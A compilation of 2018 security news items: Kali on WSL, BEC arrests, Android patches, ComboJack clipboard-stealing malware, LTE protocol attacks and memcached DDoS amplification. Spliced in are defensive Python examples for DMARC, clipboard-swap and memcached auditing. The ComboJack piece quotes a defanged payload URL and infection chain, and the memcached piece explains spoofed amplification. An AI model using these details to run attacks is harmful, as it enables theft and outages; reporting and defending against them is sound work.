

Funny? Useful? Cool? Kali Linux natively on Windows 10
7.3.2018 securityaffairs  Safety

It sounds funny, but it is true: the popular Kali Linux penetration-testing distro is available for download from the official Microsoft App Store on Windows 10.
Kali Linux is now natively available on Windows 10, without requiring dual boot or virtualization.

Kali Linux isn’t the only Linux distribution available on the Windows App Store; Windows users can download other popular distros, including Ubuntu, Fedora, and openSUSE.

The Linux distribution can be used directly on Windows through the feature called Windows Subsystem for Linux (WSL).

“For the past few weeks, we’ve been working with the Microsoft WSL team to get Kali Linux introduced into the Microsoft App Store as an official WSL distribution, and today we’re happy to announce the availability of the ‘Kali Linux’ Windows application,” reads the announcement published on the Kali Linux website.

“For Windows 10 users, this means you can simply enable WSL, search for Kali in the Windows store, and install it with a single click. This is especially exciting news for penetration testers and security professionals who have limited toolsets due to enterprise compliance standards.”

To enable WSL, follow these steps:

Open the “Apps and features” menu item under the Control Panel
Select “Programs and Features” from the right panel
Click “Turn Windows features on or off” in the left menu
Check “Windows Subsystem for Linux”
Confirm the change and reboot the system

Alternatively, users can open PowerShell as Administrator and run the following command before restarting the machine.
Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
At this point, you can search for Kali Linux on Windows Store and download it.
Offensive Security has published a video to show how to use the distribution on Windows 10.

It is important to note that Kali Linux on Windows does not come with any penetration-testing tools pre-installed, which means you need to download them when needed.

Experts noticed that antivirus software, including Windows Defender, can flag the distro’s packages as malware.

BlackBerry Sues Facebook Over Messaging Apps
6.3.2018 securityweek

Canadian telecommunications firm BlackBerry sued Facebook on Tuesday, accusing the American social media company of infringing on its patents for messaging apps.

BlackBerry is claiming infringement on patents it holds for message encryption and notifications, and is seeking an injunction as well as damages for lost profits, although no figure was given.

Facebook and its wholly-owned services Instagram and WhatsApp are named as defendants in the lawsuit.

"We have a lot of respect for Facebook and the value they've placed on messaging capabilities, some of which were invented by BlackBerry," BlackBerry spokeswoman Sarah McKinney said in a statement.

She said BlackBerry would like to partner with Facebook "in our drive toward a securely connected future, and we continue to hold this door open to them."

"However, we have a strong claim that Facebook has infringed on our intellectual property, and after several years of dialogue, we also have an obligation to our shareholders to pursue appropriate legal remedies," McKinney added.

BlackBerry, after abandoning the manufacture of its once-popular smartphones, has refocused its core business on cybersecurity software and services.

World Economic Forum Announces New Fintech Cybersecurity Consortium
6.3.2018 securityweek Cyber

Following the announcement of a new Global Centre for Cybersecurity, the World Economic Forum (WEF) has today launched a new fintech-focused initiative: WEF's Fintech Cybersecurity Consortium. Its aim is to create a framework for the assessment of cybersecurity in financial technology firms and data aggregators.

The founding members of the new consortium include global bank Citigroup, insurance company Zurich Insurance Group, fintech lender Kabbage and financial infrastructure provider DTCC. Their intention is to develop common principles for cybersecurity assessments, guidance for implementation, a point-based scoring framework, and guidance on improving an organization's score.

"Cyber breaches recorded by businesses have almost doubled since 2013 and the estimated cost of cybercrime is $8 trillion over the next five years," said Mario Greco, Chief Executive Officer of Zurich Insurance Group, Switzerland, a participant in the consortium. "We expect the consortium to help adopt best cybersecurity practices and reduce the complexity of diverging cyber regulation around the world."

The $8 trillion figure comes from a May 2017 report from Juniper Research. More recently, McAfee reported that the cost of global cybercrime is $600 billion.

The new consortium will commence immediately, working closely with WEF's Global Centre for Cybersecurity being established in Geneva. It expects to draw upon a similar, domestic-focused project undertaken in 2017 by the US Chamber of Commerce on Critical Infrastructure Protection, Information Sharing and Cybersecurity. A detailed description is found in a separate whitepaper, Innovation-Driven Cyber-Risk to Customer Data in Financial Services (PDF). This paper makes it clear that the work will draw upon existing frameworks, with particular reference to NIST.

WEF spokesperson Georg Schmitt told SecurityWeek that the consortium is "doing this to step in where regulators might not (yet)." The paper makes it clear that recent cyber developments are considered to be a major threat to the financial sector. Two of these are the evolution of open banking driven by European finance legislation such as PSD2, and the customer privacy regulations, led perhaps by GDPR. The former increases fintech's attack surface, while rapid growth in the IoT and use of AI algorithms increases the amount of PII collected and stored.

"It's a smart move to highlight data aggregators as a point of cyber vulnerability," David Shrier, CEO of Distilled Analytics told SecurityWeek. "You have only to look at the Equifax hack to understand why this is important. And classically they are not considered fintechs, so it's worthwhile to call them out separately.

"Unknowingly," he adds, "in our race to adopt new technology over the past 20 years, we have ceded a massive amount of personal information to these third parties (data aggregator and fintech alike), and it has created gigantic cyber vulnerabilities."

Kabbage CEO Rob Frohwein explained: "Kabbage is joining the World Economic Forum consortium because cybersecurity is a never-ending, age-long issue that requires a long-lasting solution for tomorrow and not a Band-Aid for today. We need a living global standard that allows financial services companies to compete and work with incumbent institutions across borders and industries."

The Fintech Cybersecurity Consortium will develop a cybersecurity assessment framework for fintechs and data aggregators. This will, in theory, enable new firms to interconnect with fintech and aggregator firms with greater confidence.

Some firms will likely balk at yet another fintech framework-cum-regulation, particularly since it will evolve from existing frameworks. "Unfortunately, this really doesn't change the game in any way (that I can tell)," comments Nathan Wenzler, chief security strategist at AsTech. "It is likely to get a, 'it's yet another regulation for us financial companies' kind of reaction. Yes, some financial firms might be interested. If this was any other industry besides finance, it might be something more significant. As it stands, they're pretty numb to all the regulatory requirements they deal with everywhere."

Shrier is more optimistic. "We have seen the WEF tackle other areas with paradigm-shifting thought leadership, so, provided they get the right experts in their working group, this could be additive to improving cybersecurity. While this new effort is not guaranteed to succeed, our problem today is too many headlines about cyber breaches and not enough systems thinking about cyber solutions. The WEF group has a chance to raise serious cyberthinking in the C-suite and board room proactively, instead of reactively after an incursion."

Two Scammers, Five Mules Arrested in BEC Bust
6.3.2018 securityweek

A criminal investigation commenced by the French National Gendarmerie in June 2016 led to the arrest of one French and one Belgian national on February 20, 2018 for their part in large-scale CEO fraud (also known as business email compromise -- BEC).

According to Europol, "The criminals belonged to an organized crime group involved in at least 24 cases of CEO fraud causing €4.6 million worth of damage."

The investigation was launched when French law enforcement was informed that two companies had fallen victim to BEC fraud, with a total estimated cost of €1.2 million. Since then, the investigation has identified 15 alleged Romanian company managers living in France and Belgium involved in orchestrating BEC fraud and Forex scams. Money obtained from the BEC scams was sent via the Romanian company accounts to Hong Kong.

The two suspects arrested in France are thought to be recruiters and facilitators for the criminal gang; but not the masterminds. "The suspects arrested in Paris and Lille seem to be closely linked to the ring leader(s) most probably hiding in Israel, where computers and mobile phones have also been seized," announced Europol on Friday.

A further five individuals were arrested in Belgium, suspected of acting as money mules for the gang.

BEC fraud has become a major problem over the last few years. According to figures from the FBI, worldwide BEC fraud netted $2.3 billion from 17,642 victims in at least 79 countries from October 2013 through February 2016.

A typical BEC scam persuades an authorized employee to wire money to an external account. It is a sophisticated version -- with much higher stakes -- of the pre-internet fax directory scam, where a fake invoice is sent to a company because it often just gets paid. It operates much like targeted spear-phishing, using a disguised sender and social engineering to trick the target. Typically, it is an email disguised to appear as if it comes from the CEO (hence its common description as CEO fraud), asking the finance director to urgently send funds to or on behalf of a supplier or partner.

In this instance, the two arrested in France helped people to establish firms with Romanian bank accounts. According to Europol these included law firms and notaries. An apparent email from the CEO asking for funds to be sent to a law firm in France acting on behalf of a known or fictitious supplier could appear both safe and compelling.

Unlike phishing, BEC carries no payload in the form of a malicious link or weaponized attachment. Without such a payload to detect, BEC emails are very difficult to flag with technology.

In February, Agari published a trends analysis (PDF) of BEC. It found that in the second half of 2017, an average of 45 BEC attacks per company bypassed secure email gateways (SEG), advanced threat protection systems (APT), and targeted attack protection (TAP); 96% of organizations had experienced BEC attacks; and one company had experienced 369 attacks.

DMARC can help prevent BEC, but is not foolproof. Furthermore, Agari points out that 67% of the Fortune 500 do not have a DMARC policy, and only 5% have a Reject (or “blocking”) policy on their corporate domain.
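The DMARC observation above can be checked mechanically for any list of domains. The Python below is an added example, not Agari's or the article's code: it parses DMARC TXT records and rates each domain the way the statistic does (is a valid policy published at all, and is it an enforcing reject/quarantine policy applied to all failing mail). The domains and records are constructed samples, not real lookups; in practice the record string would come from a DNS TXT query for `_dmarc.<domain>`.

```python
from dataclasses import dataclass
from typing import Optional

# Constructed sample records keyed by domain (no real DNS lookups were made).
SAMPLE_RECORDS = {
    "no-policy.example": None,  # no _dmarc TXT record published at all
    "monitor.example": "v=DMARC1; p=none; rua=mailto:dmarc@monitor.example",
    "partial.example": "v=DMARC1; p=quarantine; pct=50; rua=mailto:dmarc@partial.example",
    "reject.example": "v=DMARC1; p=reject; sp=reject; adkim=s; aspf=s; rua=mailto:dmarc@reject.example",
    "broken.example": "p=reject; v=DMARC1",  # v= must be the first tag, so receivers ignore this
}


def parse_dmarc(record: Optional[str]) -> Optional[dict]:
    """Parse a DMARC TXT record into {tag: value}; None if it is not a usable DMARC record."""
    if not record:
        return None
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" not in part:
            return None
        key, value = (s.strip() for s in part.split("=", 1))
        # RFC 7489: the "v" tag must come first.
        if not tags and key.lower() != "v":
            return None
        tags[key.lower()] = value
    if tags.get("v", "").upper() != "DMARC1" or "p" not in tags:
        return None
    return tags


@dataclass
class DmarcAssessment:
    domain: str
    present: bool        # a valid record with a policy exists
    policy: str          # "none", "quarantine", "reject", or "" when absent
    pct: int             # share of failing mail the policy applies to (default 100)
    enforcing: bool      # quarantine/reject applied to 100% of failing mail
    has_reporting: bool  # an aggregate-report address (rua) is set


def assess(domain: str, record: Optional[str]) -> DmarcAssessment:
    tags = parse_dmarc(record)
    if tags is None:
        return DmarcAssessment(domain, False, "", 0, False, False)
    policy = tags["p"].lower()
    try:
        pct = int(tags.get("pct", "100"))
    except ValueError:
        pct = 100  # receivers treat an unparseable pct as the default
    enforcing = policy in ("quarantine", "reject") and pct == 100
    return DmarcAssessment(domain, True, policy, pct, enforcing, "rua" in tags)


def summarize(records: dict) -> dict:
    """Count domains without a policy, with a reject policy, and with full enforcement."""
    results = [assess(domain, record) for domain, record in records.items()]
    return {
        "total": len(results),
        "without_policy": sum(1 for r in results if not r.present),
        "reject": sum(1 for r in results if r.policy == "reject"),
        "enforcing": sum(1 for r in results if r.enforcing),
    }


if __name__ == "__main__":
    for domain, record in SAMPLE_RECORDS.items():
        print(assess(domain, record))
    print(summarize(SAMPLE_RECORDS))
```

Note that a `p=none` record gives visibility through the `rua` reports but blocks nothing, and a `pct` below 100 leaves the remainder of spoofed mail untouched; only `p=reject` (or `p=quarantine`) at `pct=100` is the "blocking" configuration the article refers to.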

Because of the difficulties in detecting BEC attacks, there have been several major successful examples during 2017. In April 2017, the Justice Department disclosed that Google and Facebook lost a combined $100 million to BEC attacks impersonating their server hardware supplier Quanta. In June 2017, New York Judge Lori Sattler was duped into sending $1,057,500 to a scammer posing as her lawyer in a real estate deal. In August 2017, MacEwan University in Alberta, Canada was defrauded of $11.8 million in a BEC attack impersonating a vendor of the university.

Android's March 2018 Patches Fix Critical, High Risk Flaws
6.3.2018 securityweek Android

Google has released its March 2018 set of security updates for Android to address numerous Critical and High severity vulnerabilities in the popular mobile operating system.

The majority of the Critical vulnerabilities addressed this month could allow an attacker to execute code remotely on affected devices. Impacted components include the media framework, system, kernel, Nvidia, and Qualcomm components.

A total of 16 vulnerabilities were addressed as part of the 2018-03-01 security patch level: 8 rated Critical severity and 8 considered High risk. The most severe of these vulnerabilities could allow a remote attacker using a specially crafted file to run arbitrary code with high privileges.

Four of the Critical flaws (three remote code execution bugs and one elevation of privilege issue) and two High risk bugs (elevation of privilege) were addressed in media framework. The remaining four Critical vulnerabilities (all remote code execution) and six High risk issues (information disclosure bugs) were resolved in system.

The 2018-03-05 security patch level addressed 21 vulnerabilities, only three of which were rated Critical severity. All of the remaining bugs were assessed High risk, Google notes in an advisory.

The flaws affect Kernel components (two elevation of privilege and four information disclosure High risk issues), NVIDIA components (two High risk elevation of privilege bugs), Qualcomm components (two Critical – remote code execution – and nine High risk – six elevation of privilege, two information disclosure, and one denial of service – vulnerabilities), and Qualcomm closed-source components (one Critical and one High risk).

Google also addressed over 40 vulnerabilities impacting its Pixel / Nexus devices this month, most of them rated Moderate severity.

A Moderate risk elevation of privilege issue was patched in framework, 2 High severity denial of service bugs were resolved in Media framework, and 2 elevation of privilege and 2 information disclosure vulnerabilities were fixed in system, all four Medium risk.

Google also addressed 1 High risk information disclosure and 5 Moderate elevation of privilege issues in kernel components, 3 moderate information disclosure bugs in Nvidia components, and 18 elevation of privilege and 9 information disclosure issues in Qualcomm components (all Moderate severity).

Pixel 2 and Pixel 2 XL devices also received fixes for several functionality issues that were not related to the security of these devices. Instead, they improved screen wake performance with fingerprint unlock, audio performance when recording video, and crash reporting.

Kaspersky Lab Offers $100,000 for Critical Vulnerabilities
6.3.2018 securityweek

Just days before its annual Security Analyst Summit kicks off in Cancun, Mexico, Kaspersky Lab this week announced an extension to its bug bounty program and plans to pay rewards of up to $100,000 for severe vulnerabilities in some of its products.

Launched in August 2016, the HackerOne-powered bug bounty program initially promised a total of $50,000 in bounties and resulted in the discovery of more than 20 flaws in the first six months. To date, the program allowed Kaspersky to address more than 70 bugs in its products and services.

In April last year, the Moscow-based security firm announced the addition of Kaspersky Password Manager 8 to the bounty program, along with an increase in the maximum reward for remote code execution vulnerabilities from $2,000 to $5,000.

The newly announced larger payouts represent a 20-fold increase on existing rewards available to researchers who participate in the company’s bug bounty program, which is available to all members of the HackerOne platform.

The largest rewards will be offered for the discovery and coordinated disclosure of bugs that enable remote code execution via the product database update channel, Kaspersky says. Another requirement is that the launch of the code takes place in the product’s high privilege process and silently from the user, and that persistence is also achieved.

Security flaws leading to other types of remote code execution will receive rewards ranging from $5,000 to $20,000, depending on their complexity level. The company also announced it is willing to pay researchers who discover bugs allowing local privilege escalation or leading to sensitive data disclosure.

Only previously unknown vulnerabilities discovered in Kaspersky Internet Security 2019 (the most recent beta) and Kaspersky Endpoint Security 11 (the most recent beta) qualify for the bug bounties. Supported platforms include desktop Windows 8.1 and higher, with the most recent updates installed.

“Finding and fixing bugs is a priority for us as a software company. We invite security researchers to make sure there are no vulnerabilities in our products. The immunity of our code and highest levels of protection that we offer customers is a core principle of our business – and a fundamental pillar of our Global Transparency Initiative,” Eugene Kaspersky, CEO of Kaspersky Lab, said.

Announced in October 2017, the Global Transparency Initiative was meant to clear Kaspersky’s name after reports suggested it had ties to the Russian government and the Department of Homeland Security (DHS) ordered all government agencies to stop using the company’s products.

"ComboJack" Malware Steals Multiple Virtual Currencies
6.3.2018 securityweek Cryptocurrency

A newly discovered piece of malware is capable of stealing a variety of crypto-coins from its victims by replacing legitimate wallet addresses with that of the attacker.

Dubbed ComboJack, the malware performs its nefarious activity by monitoring the user clipboard and replacing targeted addresses there. This is the same technique that was recently observed being used by the Evrial Trojan and the CryptoShuffler malware, but the new threat targets multiple virtual currencies.

ComboJack, Palo Alto Networks has discovered, is targeting multiple crypto-currencies at the moment, including Bitcoin, Litecoin, Monero, and Ethereum.

The malware is being distributed through spam emails targeting users in Japan and America, carrying a malicious PDF that contains an embedded document. This is an RTF file attempting to exploit CVE-2017-8579, a vulnerability addressed in September 2017 after it was abused to spread the FinFisher spyware.

The RTF document references an embedded remote object, an HTA file that contains encoded PowerShell commands. Once fetched from the remote server, the file executes the PowerShell to download and run the final payload.

The downloaded file is an initial-stage self-extracting executable (SFX) that extracts the second stage, a password-protected SFX whose password is supplied by the first stage. Only after the second stage is executed is ComboJack extracted.

First, the malware copies itself to the ProgramData folder, then uses the built-in Windows tool attrib.exe to set the hidden and system attributes on itself. Next, the malware sets a registry key to achieve persistence.

Once the steps have been completed, ComboJack starts checking the contents of the clipboard every half second to determine if wallet information for different digital currencies has been copied there. When that happens, the malware replaces the information with hardcoded data in an attempt to divert funds to a presumably attacker-owned wallet.

“This tactic relies on the fact that wallet addresses are typically long and complex and to prevent errors, most users will opt to copy an exact string in order to prevent potential errors,” Palo Alto points out.

The malware can detect addresses of crypto-currencies such as Ethereum, Monero (erroneously, the replacement address is shorter), Bitcoin, Litecoin, Qiwi, WebMoney (Rubles), WebMoney (USD), Yandex Money, and a currently unknown virtual coin.

The fact that ComboJack is targeting WebMoney (USD, EUR, and RUB) and Yandex Money, which are popular digital payment systems, also sets the malware apart from other Trojans capable of stealing crypto-currencies by replacing wallet addresses that have been copied to the clipboard.

“By targeting multiple cryptocurrencies and web based wallets, the author of ComboJack appears to be hedging his or her bets on which currency will boom and which will bust. As the prices of cryptocurrencies continue to rise it is likely we will see more and more malware targeting cryptocurrencies, as it presents the fastest way to the highest profit,” Palo Alto concludes.

Researchers Devise New Attacks Against 4G LTE Mobile Networks
6.3.2018 securityweek Mobil 

A team of researchers from Purdue University and the University of Iowa have discovered 10 new attacks against the 4G LTE protocol, which could allow adversaries to snoop on messages, deny service, and even track the location of users.

In a whitepaper (PDF), the team provides information on LTEInspector, the adversarial model-based testing approach they decided to adopt in this quest, and on the 10 new vulnerabilities they discovered in the protocol, alongside 9 previously known attacks.

LTEInspector, the researchers explain, was designed to analyze three critical procedures in the 4G LTE network, namely attach, detach, and paging. Designed to be tool-agnostic, the new approach can be “instantiated through any generic symbolic model checker and cryptographic protocol verifier,” the researchers say.

Using the new approach, the researchers discovered undocumented attacks on each of the critical procedures in the protocol. Four of the attacks affect the attach procedure, one affects the detach procedure, and five affect paging.

The first such attack is called Authentication Synchronization Failure and could disrupt the attach procedure, thus resulting in the victim experiencing service disruption.

A Traceability Attack can be abused to track a particular victim user equipment. “This attack can also be performed for a specific user with only the knowledge of victim’s phone number,” the researchers say.

The Numb Attack allows the adversary to inject an out-of-sequence control-plane protocol message and disrupt the service of a victim user device until restart. This issue can be chained with other types of assaults to impersonate the victim.

A Paging Channel Hijacking attack enables an adversary to hijack the victim device’s paging channel, thus preventing it from receiving legitimate paging messages, meaning that the victim does not receive service notifications such as incoming phone calls or SMS.

A Stealthy kicking-off Attack results in the user device disconnecting from the Evolved Packet Core (EPC) and can be used as a prerequisite of the Authentication Relay Attack.

As part of a Panic Attack, an adversary injects fake emergency paging messages to a large number of user devices, thus creating an artificial emergency.

An adversary could also launch Energy Depletion Attacks to make user devices “perform expensive cryptographic operations,” by forcing them to repeatedly carry out the expensive attach procedure.

The Linkability Attack, the researchers say, would allow an adversary to trace a victim device in a cell area by broadcasting a paging message with the victim’s IMSI and observing the resulting attach request.

The only attack against the detach procedure is the Detach/Downgrade Attack, where the adversary injects network initiated detach requests to disrupt the victim’s service.

The researchers also point out that it is possible to chain some of these attacks with previously known assault methods, as well as among them, which could have wider implications. One such attack is the Authentication Relay Attack, where the victim device is disconnected from the EPC and the adversary connects instead, impersonating it, despite the lack of proper credentials.

“In this attack the adversary, however, cannot decrypt or inject valid encrypted messages unless the operator uses a weak or no security context,” the researchers explain.

ComboJack Malware alters Windows clipboards to steal cryptocurrencies and payments
6.3.2018 securityweek Cryptocurrency

Palo Alto Networks discovered a malware dubbed ComboJack that is able to detect when users copy a cryptocurrency address and alters the clipboard to steal cryptocurrencies and payments.
Crooks continue to focus their interest on cryptocurrencies. Security researchers at Palo Alto Networks have spotted a strain of malware dubbed ComboJack that is able to detect when users copy a cryptocurrency address to the Windows clipboard. The malicious code then replaces the address in the clipboard with the author’s own.

“Unit 42 researchers have discovered a new currency stealer which targets cryptocurrencies and online wallets. “CryptoJack” functions by replacing clipboard addresses with an attacker-controlled address which sends funds into the attacker’s wallet.” reads the analysis published by PaloAlto. “This technique relies on victims not checking the destination wallet prior to finalizing a transaction.”

Unlike other similar threats, ComboJack supports multiple cryptocurrencies, including Bitcoin, Litecoin, Monero, and Ethereum and it is also able to target other digital payment systems such as Qiwi, Yandex Money, and WebMoney (USD and ruble payments).

In 2017, CryptoShuffler was the first malware to implement this technique to target online Bitcoin wallets; in February 2018 researchers at ElevenPaths discovered a crypto-coin stealer called Evrial which takes control of the clipboard to get “easy money”.

Experts from PaloAlto Networks, along with Proofpoint experts, were investigating a malspam campaign targeting Japanese and American users.

The spam messages attempt to trick victims into opening the PDF attachment by claiming a passport was lost and that the attached PDF contained a scanned copy of the document.


Attackers implemented an attack chain already observed for the distribution of the Dridex banking trojan and Locky ransomware in 2017.

When the user opens the PDF document, the file opens an RTF file that contains an embedded HTA object that attempts to exploit the CVE-2017-8579 DirectX flaw.

“This embedded remote object is an HTA file which was located at hXXps://a.doko[.]moe/tnejln which contains encoded PowerShell commands.” continues the analysis.

The SFX file downloads and runs a password-protected SFX that then finally delivers ComboJack.

Finally, the payload sets a registry key to ensure persistence.


ComboJack checks the Windows clipboard every half-a-second for new content that matches a known pattern for a cryptocurrency or payment system address, then it replaces the address with one from an internal list.

The malicious code exploits the fact that wallet addresses are difficult to remember, so most users opt to copy an exact string in order to prevent potential errors.

Users are advised to carefully check that the cryptocurrency payment addresses they copy-pasted are identical in the source and destination locations.
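Both ComboJack write-ups on this page (this one and the earlier "ComboJack Malware Steals Multiple Virtual Currencies") describe the same trick: the clipboard is polled and any recognized wallet address is swapped. The Python below is an added defender-side example, not Palo Alto's code: it classifies strings by wallet-address shape for the currencies the reports name and, given a log of what the user copied versus what the clipboard later contained, flags samples where the copied address has been replaced. It also records whether the replacement has the same shape as the original, which is how the shorter Monero replacement address mentioned in the first article would stand out. The addresses and clipboard events are constructed samples; the address patterns are the standard formats for those coins.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Address shapes for the currencies named in the reports. Bitcoin legacy and Litecoin
# overlap on the "3" (P2SH) prefix, so "3..." is reported as bitcoin here.
ADDRESS_PATTERNS = {
    "ethereum": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "monero": re.compile(r"^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$"),
    "litecoin": re.compile(r"^[LM][1-9A-HJ-NP-Za-km-z]{26,33}$"),
    "bitcoin": re.compile(r"^(?:[13][1-9A-HJ-NP-Za-km-z]{25,34}|bc1[02-9ac-hj-np-z]{11,71})$"),
}


def address_type(text: Optional[str]) -> Optional[str]:
    """Return the coin whose address format the text matches, or None."""
    if not text:
        return None
    text = text.strip()
    for coin, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return coin
    return None


@dataclass
class ClipboardEvent:
    t: float      # seconds
    source: str   # "user": the user copied something; "poll": a sample of clipboard contents
    value: str


def detect_swaps(events: List[ClipboardEvent]) -> List[dict]:
    """Flag clipboard samples where the address the user copied has been replaced."""
    last_copied = None
    alerts = []
    for ev in sorted(events, key=lambda e: e.t):
        if ev.source == "user":
            last_copied = ev.value
            continue
        expected_coin = address_type(last_copied)
        if expected_coin is None or ev.value == last_copied:
            continue  # user did not copy an address, or clipboard is untouched
        alerts.append({
            "t": ev.t,
            "coin": expected_coin,
            "expected": last_copied,
            "observed": ev.value,
            # A same-shape replacement is the usual case; a mismatch (e.g. a shorter
            # replacement for Monero) still indicates tampering.
            "same_shape": address_type(ev.value) == expected_coin,
        })
    return alerts


# Constructed sample values: syntactically valid addresses that belong to nobody in particular.
BTC_COPIED = "1Q2TWHE3GMdB6BZKafqwxXtWAWgFt5Jvm3"
BTC_SWAPPED = "1PxMrkVZnAGFJ1YvrTGPedn7xUhHvo6RNo"
ETH_COPIED = "0x1111222233334444555566667777888899990000"
ETH_SWAPPED = "0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef"

SAMPLE_EVENTS = [
    ClipboardEvent(0.0, "user", BTC_COPIED),
    ClipboardEvent(0.5, "poll", BTC_COPIED),     # untouched
    ClipboardEvent(1.0, "poll", BTC_SWAPPED),    # replaced between copy and paste
    ClipboardEvent(2.0, "user", ETH_COPIED),
    ClipboardEvent(2.5, "poll", ETH_SWAPPED),    # replaced again
    ClipboardEvent(3.0, "user", "meeting notes"),
    ClipboardEvent(3.5, "poll", "meeting notes"),  # not an address, nothing to check
]

if __name__ == "__main__":
    for alert in detect_swaps(SAMPLE_EVENTS):
        print(alert)
```

The same comparison is what the advice above asks a user to do by hand: the address that lands in the destination field must be identical to the one copied from the source.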

“By targeting multiple cryptocurrencies and web based wallets, the author of ComboJack appears to be hedging his or her bets on which currency will boom and which will bust.” concludes PaloAlto Networks.

“As the prices of cryptocurrencies continue to rise it is likely we will see more and more malware targeting cryptocurrencies, as it presents the fastest way to the highest profit.”

Further details, including IOCs are available in the analysis.

World’s largest DDoS attack record broken by a new memcached DDoS attack
6.3.2018 securityweek

The record for the world’s largest DDoS attack lasted just a few days: Arbor Networks reported that earlier this month a US service provider suffered a 1.7Tbps memcached DDoS attack.
On February 28, 2018, the code hosting website GitHub was hit by the largest-ever DDoS attack that peaked at 1.3Tbps. The powerful attack was abusing the memcached protocol to power so-called memcached DDoS attacks.

Memcached is a free and open source, high-performance, distributed memory caching system designed to speed up dynamic web applications by alleviating database load.

Clients communicate with memcached servers via TCP or UDP on port 11211.

Researchers from Cloudflare, Arbor Networks and security firm Qihoo 360 discovered that attackers have recently been abusing memcached for DDoS amplification attacks.

The abuse of memcached servers in DDoS attacks is quite simple: the attacker sends a request to the targeted server on port 11211, spoofing the IP address of the victim. In a memcached DDoS attack, the request sent to the server is composed of a few bytes, while the response can be tens of thousands of times bigger, resulting in an amplification attack.

Experts at Cloudflare dubbed this type of attack Memcrashed; according to the researchers, the technique could allow attackers to obtain an amplification factor of 51,200.

Researchers predicted then that threat actors in the wild would abuse misconfigured Memcached servers in future attacks, and it is exactly what is happening.

Experts at Arbor Networks reported that earlier this month a US service provider suffered a 1.7Tbps DDoS attack. The service provider was able to repel the attack thanks to adequate countermeasures, but we can consider it an exception, because such a huge volume of traffic is able to take down the majority of websites online.

The experts confirmed that in this case, too, attackers exploited unsecured memcached servers to amplify the attack.

“Today, NETSCOUT Arbor can confirm a 1.7Tbps reflection/amplification attack targeted at a customer of a U.S. based Service Provider has been recorded by our ATLAS global traffic and DDoS threat data system.” reported Arbor Networks. “The attack was based on the same memcached reflection/amplification attack vector that made up the Github attack”


The previous record DDoS attack was observed by ATLAS in 2016, it was a 650Gbps attack towards a target in Brazil.

Unfortunately the availability online of unsecured memcached servers will allow threat actors to power similar attacks in the future.

“While the internet community is coming together to shut down access to the many open memcached servers out there, the sheer number of servers running memcached openly will make this a lasting vulnerability that attackers will exploit,” continues the post published by Arbor Networks.

“It is critically important for companies to take the necessary steps to protect themselves.”

Cloudflare recommends disabling UDP support unless it’s needed and isolating memcached servers from the Internet. Internet service providers have to fix vulnerable protocols and prevent IP spoofing.

“Internet Service Providers – In order to defeat such attacks in future, we need to fix vulnerable protocols and also IP spoofing. As long as IP spoofing is permissible on the internet, we’ll be in trouble.” concluded Cloudflare.

“Developers – Please please please: Stop using UDP. If you must, please don’t enable it by default. If you do not know what an amplification attack is I hereby forbid you from ever typing SOCK_DGRAM into your editor.”
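Two things a defender can automate follow directly from the description of the attack above and from Cloudflare's recommendations. The Python below is an added example, not code from Arbor, Cloudflare or the article. The first function pairs the tiny spoofed request arriving on UDP/11211 with the reply leaving the same server, as both would be seen from the reflector's own network, and reports the amplification factor per server/victim pair; the second audits memcached's launch options for the two weaknesses the advice targets (UDP left on, service bound to every interface). The flow records and command lines are constructed samples; `-U` (UDP port, 0 to disable) and `-l` (listen address) are memcached's real options.

```python
from collections import defaultdict
from typing import List, Optional

MEMCACHED_PORT = 11211

# Constructed flow records as seen from the reflector's network: proto src dst bytes.
SAMPLE_FLOWS = [
    # Spoofed request: 203.0.113.10 (the victim) never sent this 15-byte datagram.
    "UDP 203.0.113.10:40000 198.51.100.5:11211 15",
    # The open server answers the spoofed source, and the answer is huge.
    "UDP 198.51.100.5:11211 203.0.113.10:40000 768000",
    # Unrelated web traffic.
    "TCP 192.0.2.7:51515 198.51.100.80:443 1200",
    "TCP 198.51.100.80:443 192.0.2.7:51515 54000",
    # A legitimate local cache client over TCP: never part of the reflection picture.
    "TCP 198.51.100.6:33333 198.51.100.5:11211 40",
    "TCP 198.51.100.5:11211 198.51.100.6:33333 2048",
]


def parse_flow(line: str) -> dict:
    proto, src, dst, nbytes = line.split()
    src_ip, src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return {"proto": proto, "src_ip": src_ip, "src_port": int(src_port),
            "dst_ip": dst_ip, "dst_port": int(dst_port), "bytes": int(nbytes)}


def amplification_by_target(lines: List[str], min_factor: float = 100.0) -> List[dict]:
    """Pair UDP/11211 requests with replies per (server, client) and report amplification."""
    request_bytes = defaultdict(int)
    reply_bytes = defaultdict(int)
    for line in lines:
        f = parse_flow(line)
        if f["proto"] != "UDP":
            continue  # TCP cannot be spoofed this way, so it is not a reflection vector
        if f["dst_port"] == MEMCACHED_PORT:
            request_bytes[(f["dst_ip"], f["src_ip"])] += f["bytes"]
        elif f["src_port"] == MEMCACHED_PORT:
            reply_bytes[(f["src_ip"], f["dst_ip"])] += f["bytes"]
    findings = []
    for (server, client), out_bytes in reply_bytes.items():
        in_bytes = request_bytes.get((server, client), 0)
        # No matching request at all (seen only from the victim side) is still reportable.
        factor: Optional[float] = out_bytes / in_bytes if in_bytes else None
        if factor is None or factor >= min_factor:
            findings.append({"server": server, "victim": client, "request_bytes": in_bytes,
                             "reply_bytes": out_bytes,
                             "factor": round(factor) if factor is not None else None})
    return findings


def audit_memcached_args(argv: List[str]) -> List[str]:
    """Flag launch options that leave memcached usable as a UDP reflector."""
    findings = []
    udp_port = None
    listen = None
    for i, arg in enumerate(argv):
        if arg == "-U" and i + 1 < len(argv):
            udp_port = int(argv[i + 1])
        elif arg == "-l" and i + 1 < len(argv):
            listen = argv[i + 1]
    if udp_port is None:
        # memcached 1.5.6 and later default UDP off; older builds listen on UDP 11211.
        findings.append("UDP not explicitly disabled: pass -U 0 unless UDP clients are required")
    elif udp_port != 0:
        findings.append(f"UDP enabled on port {udp_port}: pass -U 0 unless UDP clients are required")
    if listen is None or listen in ("0.0.0.0", "::"):
        findings.append("listening on all interfaces: bind a private address with -l "
                        "(e.g. -l 127.0.0.1) and firewall port 11211 from the Internet")
    return findings


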